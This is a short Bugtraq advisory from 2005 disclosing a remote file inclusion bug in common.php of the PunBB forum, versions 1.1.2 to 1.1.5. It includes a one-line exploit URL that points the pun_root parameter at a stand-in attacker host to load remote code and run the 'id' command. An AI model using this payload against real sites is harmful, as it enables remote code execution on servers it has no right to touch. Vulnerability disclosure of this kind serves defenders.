Bugtraq mailing list archives

Remote File Inclusion in forum PunBB

From: "rod hedor" <rodhedor () hotmail com>
Date: Mon, 24 Oct 2005 01:57:40 +0000


Remote File Inclusion in forum PunBB

Date:24/10/2005

Severity: High

version: 1.1.2 >> 1.1.5

The bug reside in common.php



Exploit :

http://www.host.com/forum/include/common.php?pun_root=http://www.host_evil.com/cmd?&=id


Discovery by RoDheDoR

L-G-H Team

http://www.lezr.com

_________________________________________________________________

FREE pop-up blocking with the new MSN Toolbar - get it now!http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/

Current thread:

Remote File Inclusion in forum PunBB rod hedor (Oct 24)
- <Possible follow-ups>
- Re: Remote File Inclusion in forum PunBB arpen (Oct 29)